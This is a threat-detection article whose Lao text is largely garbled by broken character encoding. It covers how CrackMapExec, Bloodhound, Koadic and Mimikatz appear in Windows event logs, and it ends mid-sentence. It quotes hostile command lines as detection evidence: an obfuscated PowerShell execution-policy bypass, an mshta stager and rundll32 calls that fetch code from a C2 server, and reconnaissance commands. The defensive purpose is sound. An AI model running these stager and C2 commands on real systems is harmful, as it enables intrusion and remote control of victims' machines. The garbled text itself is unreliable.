เปเบเบทเปเบญเบเบกเบท CME เปเบเปเบเบทเบเบญเบญเบเปเบเบเบเบปเปเบเบเปเปเบเบทเปเบญเบญเบฑเบเบเบฐเปเบเบกเบฑเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเบเบปเบเบเบฐเบเบดเปเบซเบผเบปเปเบฒเบเบฑเปเบเบเบตเปเบเบนเปเปเบเบกเบเบตเบเปเบญเบเปเบฎเบฑเบเปเบเบทเปเบญเบเปเบฒเบงเบซเบเปเบฒเบเบฒเบเปเบเปเบเบทเบญเบเปเบฒเบ. เบกเบฑเบเบญเบฐเบเบธเบเบฒเบเปเบซเปเบเปเบฒเบเปเบฎเบฑเบเบงเบฝเบเบฎเปเบงเบกเบเบฑเบเบเบฑเบเบเบปเบงเปเบเบ Empire เบเบตเปเบกเบตเบเบทเปเบชเบฝเบเปเบฅเบฐ Meterpreter. เปเบเบทเปเบญเบเบฐเบเบดเบเบฑเบเบเปเบฒเบชเบฑเปเบเบฅเบฑเบเป, CME เบชเบฒเบกเบฒเบเปเบฎเบฑเบเปเบซเปเบเบงเบเปเบเบปเบฒเบชเบฑเบเบชเบปเบ. เบเบฒเบเบเปเบฒเปเบเป Bloodhound (เปเบเบทเปเบญเบเบกเบทเบเบฒเบเบชเบญเบเปเบเบกเปเบเบเบเปเบฒเบเบซเบฒเบ), เบเบนเปเปเบเบกเบเบตเบชเบฒเบกเบฒเบเบญเบฑเบเบเบฐเปเบเบกเบฑเบเบเบฒเบเบเบปเปเบเบซเบฒเบชเปเบฒเบฅเบฑเบเบเบญเบเบเบฐเบเบธเบกเบเบนเปเปเบเบดเปเบเปเบเบเปเบเปเบกเบเบเบตเปเบกเบตเบเบฒเบเปเบเบทเปเบญเบเปเบซเบง.
เบเบฒเบเบเบญเบเปเบฅเบทเบญเบ
Bloodhound, เปเบเบฑเบเปเบเบทเปเบญเบเบกเบท standalone, เบญเบฐเบเบธเบเบฒเบเปเบซเปเบชเปเบฒเบฅเบฑเบเบเบฒเบ reconnaissance เบเปเบฒเบงเบซเบเปเบฒเบเบฒเบเบเปเบฒเบเปเบเปเบเบทเบญเบเปเบฒเบ. เบกเบฑเบเบฅเบงเบเบฅเบงเบกเบเปเปเบกเบนเบเบเปเบฝเบงเบเบฑเบเบเบนเปเปเบเป, เปเบเบทเปเบญเบเบเบฑเบ, เบเบธเปเบก, เปเบเบเบเบฑเบ เปเบฅเบฐเบเบทเบเบชเบฐเปเบญเบเปเบซเปเปเบเบฑเบ PowerShell script เบซเบผเบท binary file. LDAP เบซเบผเบท SMB-based protocols เบเบทเบเบเปเบฒเปเบเปเปเบเบทเปเบญเปเบเบฑเบเบเปเบฒเบเปเปเบกเบนเบ. เปเบกเบเบนเบเบเบฒเบเบฅเบงเบกเบเบปเบง CME เบญเบฐเบเบธเบเบฒเบเปเบซเป Bloodhound เบเบฒเบงเปเบซเบผเบเปเบชเปเปเบเบทเปเบญเบเบเบญเบเบเบนเปเปเบเบฒเบฐเบฎเปเบฒเบ, เปเบฅเปเบเปเบฅเบฐเบฎเบฑเบเบเปเปเบกเบนเบเบเบตเปเปเบเบฑเบเบเปเบฒเบซเบผเบฑเบเบเบฒเบเบเบฒเบเบเบฐเบเบดเบเบฑเบ, เบเบฑเปเบเบเบฑเปเบเบเบฒเบเบเปเบฒเปเบเบตเบเบเบฒเบเบญเบฑเบเบเบฐเปเบเบกเบฑเบเปเบเบฅเบฐเบเบปเบเปเบฅเบฐเปเบฎเบฑเบเปเบซเปเบเบงเบเปเบเบปเบฒเบชเบฑเบเปเบเบเปเบซเบฑเบเบซเบเปเบญเบเบฅเบปเบ. เปเบเบฐเบเบฒเบเบดเบ Bloodhound เบเปเบฒเบชเบฐเปเบซเบเบตเบเปเปเบกเบนเบเบเบตเปเปเบเบฑเบเบเปเบฒเปเบเบฎเบนเบเปเบเบเบเบญเบเบเบฒเบ, เปเบเบดเปเบเบเปเบงเบเปเบซเปเบเปเบฒเบเบชเบฒเบกเบฒเบเบเบญเบเบซเบฒเปเบชเบฑเปเบเบเบฒเบเบเบตเปเบชเบฑเปเบเบเบตเปเบชเบธเบเบเบฒเบเปเบเบทเปเบญเบเบเบญเบเบเบนเปเปเบเบกเบเบตเปเบเบซเบฒเบเบนเปเปเบเบดเปเบเปเบเบเปเบเปเบกเบ.
เปเบเบปเปเบฒ. 6. เบเบฒเบเปเบเปเบเบญเบ Bloodhound
เปเบเบทเปเบญเบเปเบฒเปเบเบตเบเบเบฒเบเบขเบนเปเปเบเปเบเบทเปเบญเบเบเบญเบเบเบนเปเบเบทเบเปเบเบฒเบฐเบฎเปเบฒเบ, เปเบกเบเบนเบเบเบฐเบชเปเบฒเบเบงเบฝเบเบเบฒเบเปเบเบเปเบเป ATSVC เปเบฅเบฐ SMB. ATSVC เปเบกเปเบเบเบฒเบเปเบเปเบเบญเบเบชเปเบฒเบฅเบฑเบเบเบฒเบเปเบฎเบฑเบเบงเบฝเบเบเบฑเบ Windows Task Scheduler. CME เปเบเปเบเบฑเบเบเบฑเบ NetrJobAdd(1) เปเบเบทเปเบญเบชเปเบฒเบเบงเบฝเบเบเปเบฒเบเปเบเบทเบญเบเปเบฒเบ. เบเบปเบงเบขเปเบฒเบเบเบญเบเบชเบดเปเบเบเบตเปเปเบกเบเบนเบ CME เบชเบปเปเบเปเบกเปเบเบชเบฐเปเบเบเบขเบนเปเปเบเบฎเบนเบ. 7: เบเบตเปเปเบกเปเบเบเบฒเบเปเบญเบตเปเบเบเปเบฒเบชเบฑเปเบ cmd.exe เปเบฅเบฐเบฅเบฐเบซเบฑเบ obfuscated เปเบเบฎเบนเบเปเบเบเบเบฒเบเปเบเปเบเบฝเบเปเบเบฎเบนเบเปเบเบ XML.
Fig.7. เบชเปเบฒเบเปเปเบฒเบงเบฝเบเบเปเบฒเบ CME
เบซเบผเบฑเบเบเบฒเบเบงเบฝเบเบเบฒเบเปเบเปเบเบทเบเบชเบปเปเบเปเบเบทเปเบญเบเบฐเบเบดเบเบฑเบ, เปเบเบทเปเบญเบเบเบญเบเบเบนเปเบเบทเบเปเบเบฒเบฐเบฎเปเบฒเบเปเบฅเบตเปเบกเบเบปเปเบ Bloodhound เบเบปเบงเบเบญเบเบกเบฑเบเปเบญเบ, เปเบฅเบฐเบเบตเปเบชเบฒเบกเบฒเบเปเบซเบฑเบเปเบเปเปเบเบเบฒเบเบเบฐเบฅเบฒเบเบญเบ. เปเบกเบเบนเบเปเบกเปเบเบกเบตเบฅเบฑเบเบชเบฐเบเบฐเปเบเบเบเบฒเบเบชเบญเบเบเบฒเบก LDAP เปเบเบทเปเบญเปเบซเปเปเบเปเบฎเบฑเบเบเบธเปเบกเบกเบฒเบเบเบฐเบเบฒเบ, เบเบฑเบเบเบตเบฅเบฒเบเบเบทเปเบเบญเบเปเบเบทเปเบญเบเบเบฑเบเปเบฅเบฐเบเบนเปเปเบเปเบเบฑเบเบซเบกเบปเบเปเบเปเบเปเบกเบ, เปเบฅเบฐเปเบเปเบฎเบฑเบเบเปเปเบกเบนเบเบเปเบฝเบงเบเบฑเบเบเบญเบเบเบฐเบเบธเบกเบเบนเปเปเบเปเบเบตเปเบกเบตเบเบฒเบเปเบเบทเปเบญเบเปเบซเบงเปเบเบเบเปเบฒเบเบเปเบฒเบฎเปเบญเบเบเป SRVSVC NetSessEnum.
เปเบเบปเปเบฒ. 8. เปเบเปเบฎเบฑเบเบเบฑเบเบเบตเบฅเบฒเบเบเบทเปเบเบญเบเบเบญเบเบเบฐเบเบธเบกเบเบตเปเบกเบตเบเบฒเบเปเบเบทเปเบญเบเปเบซเบงเบเปเบฒเบ SMB
เบเบญเบเบเบฒเบเบเบฑเปเบ, เบเบฒเบเปเบเบตเบเบเบปเบง Bloodhound เปเบเปเบเบทเปเบญเบเบเบญเบเบเบนเปเปเบเบฒเบฐเบฎเปเบฒเบเบเบตเปเบกเบตเบเบฒเบเปเบเบตเบเปเบเปเบเบฒเบเบเบงเบเบชเบญเบเปเบกเปเบเบกเบฒเบเปเบญเบกเบเบฑเบเปเบซเบเบเบฒเบเบเบตเปเบกเบต ID 4688 (เบเบฒเบเบชเปเบฒเบเบเบฐเบเบงเบเบเบฒเบ) เปเบฅเบฐเบเบทเปเบเบฐเบเบงเบเบเบฒเบ. ยซC:WindowsSystem32cmd.exeยป
. เบชเบดเปเบเบเบตเปเปเบเบฑเบเบเบฒเบชเบฑเบเปเบเบเปเบกเปเบ arguments เปเบเบงเบเปเบฒเบชเบฑเปเบ:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , โฆ , 40,41 )-jOIN'' ) "
Enum_avproducts
เปเบกเบเบนเบ enum_avproducts เปเบกเปเบเบซเบเปเบฒเบชเบปเบเปเบเบซเบผเบฒเบเบเบฒเบเบเบธเบเบเบญเบเบเบฒเบเบเปเบฒเบเบฒเบเปเบฅเบฐเบเบฒเบเบเบฑเบเบเบฑเปเบเบเบฐเบเบดเบเบฑเบ. WMI เบญเบฐเบเบธเบเบฒเบเปเบซเปเบเปเบฒเบเปเบเปเบเบฒเบชเบฒเบชเบญเบเบเบฒเบก WQL เปเบเบทเปเบญเบเบถเบเบเปเปเบกเบนเบเบเบฒเบเบงเบฑเบเบเบธ Windows เบเปเบฒเบเป, เปเบเบดเปเบเปเบเบฑเบเบชเบดเปเบเบเปเบฒเปเบเบฑเบเบเบตเปเปเบกเบเบนเบ CME เบเบตเปเปเบเป. เบกเบฑเบเบชเปเบฒเบเบเบฒเบเบชเบญเบเบเบฒเบกเบเบฑเบเบซเปเบญเบเบฎเบฝเบ AntiSpywareProduct เปเบฅเบฐ AntiะirusProduct เบเปเบฝเบงเบเบฑเบเปเบเบทเปเบญเบเบกเบทเบเปเบญเบเบเบฑเบเบเบตเปเบเบดเบเบเบฑเปเบเบขเบนเปเปเบเปเบเบทเปเบญเบเบเบญเบเบเบนเปเปเบเบฒเบฐเบฎเปเบฒเบ. เปเบเบทเปเบญเปเบซเปเปเบเปเบฎเบฑเบเบเปเปเบกเบนเบเบเบตเปเบเปเบฒเปเบเบฑเบ, เปเบกเบเบนเบเปเบเบทเปเบญเบกเบเปเปเบเบฑเบ namespace rootSecurityCenter2, เบซเบผเบฑเบเบเบฒเบเบเบฑเปเบเบชเปเบฒเบเบเปเบฒเบเบฒเบก WQL เปเบฅเบฐเปเบเปเบฎเบฑเบเบเบฒเบเบเบญเบเบชเบฐเบซเบเบญเบ. เปเบเบฎเบนเบ. เบฎเบนเบเบเบต 9 เบชเบฐเปเบเบเปเบซเปเปเบซเบฑเบเปเบเบทเปเบญเปเบเบเบญเบเบเบฒเบเบฎเปเบญเบเบเปเปเบฅเบฐเบเบฒเบเบเบญเบเบชเบฐเบซเบเบญเบเบเบฑเปเบเบเปเบฒเบง. เปเบเบเบปเบงเบขเปเบฒเบเบเบญเบเบเบงเบเปเบฎเบปเบฒ, Windows Defender เปเบเปเบเบทเบเบเบปเบเปเบซเบฑเบ.
เปเบเบปเปเบฒ. 9. เบเบดเบเบเบฐเบเปเบฒเปเบเบทเบญเบเปเบฒเบเบเบญเบเปเบกเบเบนเบ enum_avproducts
เปเบฅเบทเปเบญเบเป, เบเบฒเบเบเบงเบเบชเบญเบ WMI (Trace WMI-Activity), เปเบเปเบซเบเบเบฒเบเบเบตเปเปเบเบปเปเบฒเบชเบฒเบกเบฒเบเบเบญเบเบซเบฒเบเปเปเบกเบนเบเบเบตเปเปเบเบฑเบเบเบฐเปเบซเบเบเบเปเบฝเบงเบเบฑเบเบเบฒเบเบชเบญเบเบเบฒเบก WQL, เบญเบฒเบเบเบฐเบเบทเบเบเบดเบเปเบเปเบเบฒเบ. เปเบเปเบเปเบฒเบกเบฑเบเบเบทเบเปเบเบตเบเปเบเป, เบซเบผเบฑเบเบเบฒเบเบเบฑเปเบเบเปเบฒเบชเบฐเบเบดเบ enum_avproducts เบเบทเบเปเบฅเปเบ, เปเบซเบเบเบฒเบเบเบตเปเบกเบต ID 11 เบเบฐเบเบทเบเบเบฑเบเบเบถเบเปเบงเปเบกเบฑเบเบเบฐเบกเบตเบเบทเปเบเบญเบเบเบนเปเปเบเปเบเบตเปเบชเบปเปเบเบเปเบฒเบฎเปเบญเบเบเปเปเบฅเบฐเบเบทเปเปเบ namespace rootSecurityCenter2.
เปเบเปเบฅเบฐเปเบกเบเบนเบ CME เบกเบตเบชเบดเปเบเบเบฐเบเบดเบเบเบญเบเบเบปเบเปเบญเบ, เบเปเปเบงเปเบฒเบเบฐเปเบเบฑเบเบเบฒเบเบชเบญเบเบเบฒเบก WQL เบชเบฐเปเบเบฒเบฐเบซเบผเบทเบเบฒเบเบชเปเบฒเบเบเบฐเปเบเบเบเบญเบเบงเบฝเบเบเบฒเบเบชเบฐเปเบเบฒเบฐเปเบเบซเบเบถเปเบเปเบเบเบฒเบเบฐเบฅเบฒเบเบงเบฝเบเบเบฒเบเบเบตเปเบกเบต obfuscation เปเบฅเบฐเบเบดเบเบเบฐเบเปเบฒเบชเบฐเปเบเบฒเบฐ Bloodhound เปเบ LDAP เปเบฅเบฐ SMB.
KOADIC
เบฅเบฑเบเบชเบฐเบเบฐเบเบตเปเปเบเบเปเบเบฑเปเบเบเบญเบ Koadic เปเบกเปเบเบเบฒเบเปเบเปเบเบปเบงเปเบเบเบฒเบชเบฒ JavaScript เปเบฅเบฐ VBScript เบเบตเปเบชเปเบฒเบเบเบถเปเบเปเบ Windows. เปเบเบเบงเบฒเบกเบซเบกเบฒเบเบเบตเป, เบกเบฑเบเบเบฐเบเบดเบเบฑเบเบเบฒเบกเปเบเบงเปเบเปเบกเบเบฒเบเบเปเบฒเบฅเบปเบเบเบตเบงเบดเบเบเบญเบเปเบเปเบเบเบดเบ - เบเบฑเปเบเปเบกเปเบ, เบกเบฑเบเบเปเปเบกเบตเบเบฒเบเปเบเบดเปเบเบเบฒเบญเบฒเปเบชเบเบฒเบเบเบญเบเปเบฅเบฐเปเบเปเปเบเบทเปเบญเบเบกเบท Windows เบกเบฒเบเบเบฐเบเบฒเบ. เบเบตเปโเปเบกเปเบโเปเบเบทเปเบญเบโเบกเบทโเบชเปเบฒโเบฅเบฑเบโเบเปเบฒโเบชเบฑเปเบโเปเบฅเบฐโเบเบฒเบโเบเบงเบโเบเบธเบก (CnCโ) เบขเปเบฒเบโเปเบเบฑเบกโเบเบตเปโ, เบเบฑเบโเบเบฑเปเบโเปเบเปโเบซเบผเบฑเบโเบเบฒเบโเบเบฒเบโเบเบดเบโเปเบเบทเปเบญ "implantโ" เบเบทเบโเบเบดเบโเบเบฑเปเบโเปเบโเปเบเบทเปเบญเบโ, เปเบฎเบฑเบโเปเบซเปโเบกเบฑเบโเบชเบฒโเบกเบฒเบโเบเบงเบโเบเบธเบกโเปเบเปโ. เปเบเบทเปเบญเบเบเบฑเปเบเบเปเบฒเบง, เปเบเบเปเบฒเบชเบฑเบเบเบฒเบชเบฒ Koadic, เบเบทเบเปเบญเบตเปเบเบงเปเบฒ "เบเบตเบเบดเบ." เบเปเบฒเบกเบตเบชเบดเบเบเบดเบเบดเปเบชเบเบเบตเปเบเปเปเบเบฝเบเบเปเบชเปเบฒเบฅเบฑเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเบเบฒเบเบขเปเบฒเบเปเบเบฑเบกเบเบตเปเบขเบนเปเปเบเบเปเบฒเบเบเบญเบเบเบนเปเบเบทเบเปเบเบฒเบฐเบฎเปเบฒเบ, Koadic เบกเบตเบเบงเบฒเบกเบชเบฒเบกเบฒเบเบเบตเปเบเบฐเบเบปเบเบชเบนเบเบเบงเบเปเบเบปเบฒเปเบเบเปเบเปเปเบเบฑเบเบเบดเบเบเบฒเบเบเบงเบเบเบธเบกเบเบฑเบเบเบตเบเบนเปเปเบเป (UAC bypass).
เปเบเบปเปเบฒ. 10. เปเบเบเบดเบ Shell
เบเบนเปเบเบทเบเปเบเบฒเบฐเบฎเปเบฒเบเบเปเบญเบเปเบฅเบตเปเบกเบเบปเปเบเบเบฒเบเบชเบทเปเบชเบฒเบเบเบฑเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบเบเปเบฒเบชเบฑเปเบ & เบเบฒเบเบเบงเบเบเบธเบก. เปเบเบทเปเบญเปเบฎเบฑเบเบชเบดเปเบเบเบตเป, เบเบฒเบเบเปเบญเบเบเบฒเบเบเบดเบเบเปเปเบเบฑเบ URI เบเบตเปเบเบฝเบกเปเบงเปเบเปเบญเบเบซเบเปเบฒเบเบตเปเปเบฅเบฐเปเบเปเบฎเบฑเบเบฎเปเบฒเบเบเบฒเบ Koadic เบเบปเปเบเบเปเปเบเบเปเบเปเบซเบเบถเปเบเปเบ stagers. เปเบเบฎเบนเบ. เบฎเบนเบเบเบต 11 เบชเบฐเปเบเบเบเบปเบงเบขเปเบฒเบเบชเปเบฒเบฅเบฑเบ mshta stager.
เปเบเบปเปเบฒ. 11. เบเบฒเบเปเบฅเบตเปเบกเบเบปเปเบเปเบเบเบเบฑเบเบเบฑเบเปเบเบตเบเปเบงเบต CnC
เบญเบตเบเบเบฒเบกเบเบปเบงเปเบเบเบฒเบเบเบญเบเบชเบฐเบซเบเบญเบ WS, เบกเบฑเบเบเบฐเบเบฒเบเปเบเบฑเบเบเบตเปเบเบฑเบเปเบเบเบงเปเบฒเบเบฒเบเบเบฐเบเบดเบเบฑเบเปเบเบตเบเบเบทเปเบเบเปเบฒเบ WScript.Shell, เปเบฅเบฐเบเบปเบงเปเบ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE เบกเบตเบเปเปเบกเบนเบเบเบตเปเบชเปเบฒเบเบฑเบเบเปเบฝเบงเบเบฑเบเบเบฒเบฅเบฒเบกเบดเปเบเบตเบเบญเบเปเบเบเบเบฑเบเปเบเบเบฐเบเบธเบเบฑเบ. เบเบตเปเปเบกเปเบเบเบนเปเบเบฒเบเบเบญเบเบชเบฐเบซเบเบญเบเบเปเบฒเบฎเปเบญเบเบเปเบเบฑเปเบเบเปเบฒเบญเบดเบเปเบเบเบฒเบเปเบเบทเปเบญเบกเบเปเป HTTP เบเบฑเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบ CnC. เบเบฒเบเบฎเปเบญเบเบเปเบเปเปเบกเบฒเปเบกเปเบเบเปเบฝเบงเบเปเบญเบเปเบเบเบเบปเบเบเบฑเบเบเบฒเบเปเบฎเบฑเบเบงเบฝเบเบเบญเบเปเบกเบเบนเบเบเบตเปเปเบญเบตเปเบเบงเปเบฒ (implants). เปเบกเบเบนเบ Koadic เบเบฑเบเบซเบกเบปเบเปเบฎเบฑเบเบงเบฝเบเบเบฝเบเปเบเปเบเบฑเบเบเบญเบเบเบฐเบเบธเบกเบเบตเปเบกเบตเบเบฒเบเปเบเบทเปเบญเบเปเบซเบงเบเบฑเบ CnC.
เบกเบดเบกเบตเบเบตเบเบฒ
เบเบทเบเบฑเบเบเบฑเบ CME เปเบฎเบฑเบเบงเบฝเบเบเบฑเบ Bloodhound, Koadic เปเบฎเบฑเบเบงเบฝเบเบเบฑเบ Mimikatz เปเบเบฑเบเปเบเบเบเบฒเบเปเบเบเบเปเบฒเบเบซเบฒเบเปเบฅเบฐเบกเบตเบซเบผเบฒเบเบงเบดเบเบตเบเบตเปเบเบฐเปเบเบตเบเบเบปเบงเบกเบฑเบ. เบเปเบฒเบเบฅเบธเปเบกเบเบตเปเปเบกเปเบเบเบนเปเบเปเบฒเบฎเปเบญเบเบเปเบเบฒเบเบเบญเบเบชเบฐเบซเบเบญเบเบชเปเบฒเบฅเบฑเบเบเบฒเบเบเบฒเบงเปเบซเบผเบ Mimikatz implant.
เปเบเบปเปเบฒ. 12. เปเบญเบ Mimikatz เปเบ Koadic
เบเปเบฒเบเบชเบฒเบกเบฒเบเปเบเบดเปเบเบงเปเบฒเบฎเบนเบเปเบเบ URI เปเบเบเปเบฒเบฎเปเบญเบเบเปเบกเบตเบเบฒเบเบเปเบฝเบเปเบเบเปเบเบงเปเบ. เปเบเบเบฑเบเบเบธเบเบฑเบเบกเบฑเบเบกเบตเบเปเบฒเบชเปเบฒเบฅเบฑเบเบเบปเบงเปเบ csrf, เปเบเบดเปเบเบฎเบฑเบเบเบดเบเบเบญเบเบชเปเบฒเบฅเบฑเบเปเบกเบเบนเบเบเบตเปเปเบฅเบทเบญเบ. เบขเปเบฒเปเบญเบปเบฒเปเบเปเบชเปเบเบฑเบเบเบทเปเบเบญเบเบเบฒเบ; เบเบงเบเปเบฎเบปเบฒเบเบธเบเบเบปเบเบฎเบนเปเบงเปเบฒ CSRF เบกเบฑเบเบเบฐเปเบเบปเปเบฒเปเบเปเบเบเบเปเบฒเบเบเบฑเบ. เบเบฒเบเบเบญเบเบชเบฐเบซเบเบญเบเปเบกเปเบเบเบปเบงเบซเบผเบฑเบเบเบฝเบงเบเบฑเบเบเบญเบ Koadic, เปเบเบดเปเบเบฅเบฐเบซเบฑเบเบเบตเปเบเปเบฝเบงเบเปเบญเบเบเบฑเบ Mimikatz เปเบเปเบเบทเบเปเบเบตเปเบก. เบกเบฑเบเบเปเบญเบเบเปเบฒเบเปเบซเบเป, เบเบฑเปเบเบเบฑเปเบเปเบซเปเบเบงเบเปเบฎเบปเบฒเปเบเบดเปเบเบเบธเบเบชเปเบฒเบเบฑเบ. เปเบเบเบตเปเบเบตเปเบเบงเบเปเบฎเบปเบฒเบกเบตเบซเปเบญเบเบชเบฐเบซเบกเบธเบ Mimikatz เบเบตเปเบเบทเบเปเบเบปเปเบฒเบฅเบฐเบซเบฑเบเปเบ base64, เบซเปเบญเบเบฎเบฝเบ .NET serialized เบเบตเปเบเบฐเปเบชเปเบกเบฑเบ, เปเบฅเบฐเบเบฒเบเปเบเปเบเบฝเบเบเบตเปเบเบฐเปเบเบตเบเบเบปเบง Mimikatz. เบเบปเบเปเบเปเบฎเบฑเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเปเบเปเบเบทเบเบชเบปเปเบเบเปเบฒเบเปเบเบทเบญเบเปเบฒเบเปเบเบเปเปเบเบงเบฒเบกเบเบตเปเบเบฑเบเปเบเบ.
เปเบเบปเปเบฒ. 13. เบเบปเบเบเบญเบเบเบฒเบเปเบฅเปเบ Mimikatz เปเบเปเบเบทเปเบญเบเบซเปเบฒเบเปเบเบชเบญเบเบซเบผเบตเบ
Exec_cmd
Koadic เบเบฑเบเบกเบตเปเบกเบเบนเบเบเบตเปเบชเบฒเบกเบฒเบเบเบฐเบเบดเบเบฑเบเบเปเบฒเบชเบฑเปเบเบเบฒเบเปเบฅเบเบฐเปเบ. เปเบเบเบตเปเบเบตเปเบเบงเบเปเบฎเบปเบฒเบเบฐเปเบซเบฑเบเบงเบดเบเบตเบเบฒเบเบชเปเบฒเบ URI เบเบฝเบงเบเบฑเบเปเบฅเบฐเบเบปเบงเปเบ sid เปเบฅเบฐ csrf เบเบตเปเบเบธเปเบเปเบเบตเบ. เปเบเบเปเบฅเบฐเบเบตเบเบญเบเปเบกเบเบนเบ exec_cmd, เบฅเบฐเบซเบฑเบเบเบทเบเปเบเบตเปเบกเปเบเบปเปเบฒเปเบเปเบเบฎเปเบฒเบเบเบฒเบเบเบตเปเบชเบฒเบกเบฒเบเบเบฐเบเบดเบเบฑเบเบเปเบฒเบชเบฑเปเบเบเบญเบเปเบเบฐ. เบเปเบฒเบเบฅเบธเปเบกเบเบตเปเปเบกเปเบเบชเบฐเปเบเบเปเบซเปเปเบซเบฑเบเบฅเบฐเบซเบฑเบเบเบฑเปเบเบเปเบฒเบงเบเบตเปเบกเบตเบขเบนเปเปเบเบเบฒเบเบเบญเบเบชเบฐเบซเบเบญเบ HTTP เบเบญเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบ CnC.
เปเบเบปเปเบฒ. 14. เบฅเบฐเบซเบฑเบ Implant exec_cmd
เบเบปเบงเปเบ GAWTUUGCFI เบเบตเปเบกเบตเบเบธเบเบฅเบฑเบเบชเบฐเบเบฐ WS เบเบตเปเบเบธเปเบเปเบเบตเบเปเบกเปเบเบเปเบญเบเบเบฒเบเบชเปเบฒเบฅเบฑเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเบฅเบฐเบซเบฑเบ. เบเปเบงเบเบเบฒเบเบเปเบงเบเปเบซเบผเบทเบญเบเบญเบเบกเบฑเบ, implant เปเบญเบตเปเบเบงเปเบฒ shell, เบเบฒเบเบเบธเบเปเบเปเบเบชเบญเบเบชเบฒเบเบฒเบเบญเบเบฅเบฐเบซเบฑเบ - shell.exec เบเบฑเบเบเบฒเบเบเบฑเบเบเบทเบเบเบญเบเบเปเปเบฒเบเปเปเบกเบนเบเบเบปเบเบเบฐเบฅเบดเบเปเบฅเบฐ shell.run เปเบเบเบเปเปเบกเบตเบเบฒเบเบเบฑเบเบเบทเบ.
Koadic เบเปเปเปเบกเปเบเปเบเบทเปเบญเบเบกเบทเบเบปเปเบงเปเบ, เปเบเปเบกเบฑเบเบกเบตเบชเบดเปเบเบเบฐเบเบดเบเบเบญเบเบเบปเบเปเบญเบเปเบเบเบเบตเปเบกเบฑเบเบชเบฒเบกเบฒเบเบเบปเบเปเบซเบฑเบเบขเบนเปเปเบเบเบฒเบเบเบฐเบฅเบฒเบเบญเบเบเบตเปเบเบทเบเบเปเบญเบ:
- เบเบฒเบเบชเปเบฒเบเปเบเบเบเบดเปเบชเบเบเบญเบเบเบฒเบเบฎเปเบญเบเบเป HTTP,
- เปเบเป winHttpRequests API,
- เบเบฒเบเบชเปเบฒเบเบงเบฑเบเบเบธ WScript.Shell เบเปเบฒเบ ActiveXObject,
- เบฎเปเบฒเบเบเบฒเบเบเบฐเบซเบเบฒเบเปเบซเบเปเบเบตเปเบชเบฒเบกเบฒเบเบเบฐเบเบดเบเบฑเบเปเบเป.
เบเบฒเบโเปเบเบทเปเบญเบกโเบเปเปโเปเบเบทเปเบญเบโเบเบปเปเบโเปเบกเปเบโเปเบเปโเปเบฅเบตเปเบกโเบเบปเปเบโเปเบเบ stagerโ, เบชเบฐโเบเบฑเปเบโเบกเบฑเบโเปเบเบฑเบโเปเบโเปเบเปโเบเบตเปโเบเบฐโเบเบงเบโเบเบปเบโเบเบดเบโเบเบฐโเบเปเบฒโเบเบญเบโเบเบปเบโเปเบเบโเบเปเบฒเบโเปเบซเบโเบเบฒเบ Windowsโ. เบชเปเบฒเบฅเบฑเบ mshta, เบเบตเปเปเบกเปเบเปเบซเบเบเบฒเบ 4688, เปเบเบดเปเบเบเบตเปเปเบซเปเปเบซเบฑเบเบเบฒเบเบชเปเบฒเบเบเบฐเบเบงเบเบเบฒเบเบเบตเปเบกเบตเบเบธเบเบฅเบฑเบเบชเบฐเบเบฐเปเบฅเบตเปเบกเบเบปเปเบ:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6
เปเบเบเบฐเบเบฐเบเบตเป Koadic เบเปเบฒเบฅเบฑเบเปเบฅเปเบ, เบเปเบฒเบเบชเบฒเบกเบฒเบเปเบเบดเปเบเปเบซเบเบเบฒเบ 4688 เบญเบทเปเบเปเบเบตเปเบกเบตเบเบธเบเบฅเบฑเบเบชเบฐเบเบฐเบเบตเปเบกเบตเบฅเบฑเบเบชเบฐเบเบฐเบขเปเบฒเบเบชเบปเบกเบเบนเบเปเบเบ:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
เบเบฒเบเบเบปเปเบเบเบปเบ
เบเปเบฒโเบญเปเบฝเบโเบเบฒเบโเบเบณโเบฅเบปเบโเบเบตโเบงเบดเบโเบขเบนเปโเบเบญเบโเบเบดเบโเบเบงเบกโเปเบเปโเบฎเบฑเบโเบเบงเบฒเบกโเบเบดโเบเบปเบกโเบเบปเบกโเบเบญเบโเปเบโเบเบฑเบโเบเบฒโเบญเบฒเบโเบเบฒโเบเบญเบ. เบเบงเบเปเบเบปเบฒเปเบเปเปเบเบทเปเบญเบเบกเบทเปเบฅเบฐเบเบปเบเปเบเบเบตเปเบชเปเบฒเบเบเบถเปเบเปเบ Windows เบชเปเบฒเบฅเบฑเบเบเบงเบฒเบกเบเปเบญเบเบเบฒเบเบเบญเบเบเบงเบเปเบเบปเบฒ. เบเบงเบเปเบฎเบปเบฒเบเปเบฒเบฅเบฑเบเปเบซเบฑเบเปเบเบทเปเบญเบเบกเบทเบเบตเปเบเบดเบเบปเบก Koadic, CrackMapExec เปเบฅเบฐ Impacket เบเบฐเบเบดเบเบฑเบเบเบฒเบกเบซเบผเบฑเบเบเบฒเบเบเบตเปเปเบเบตเปเบกเบเบถเปเบเปเบเบเบปเบเบฅเบฒเบเบเบฒเบ APT. เบเปเบฒเบเบงเบเบเบญเบเบชเปเบญเบกเปเบ GitHub เบชเปเบฒเบฅเบฑเบเปเบเบทเปเบญเบเบกเบทเปเบซเบผเบปเปเบฒเบเบตเปเปเบกเปเบเบเบฑเบเปเบเบตเปเบกเบเบถเปเบ, เปเบฅเบฐเบญเบฑเบเปเบซเบกเปเบเปเบฒเบฅเบฑเบเบเบฐเบเบปเบเบเบถเปเบ 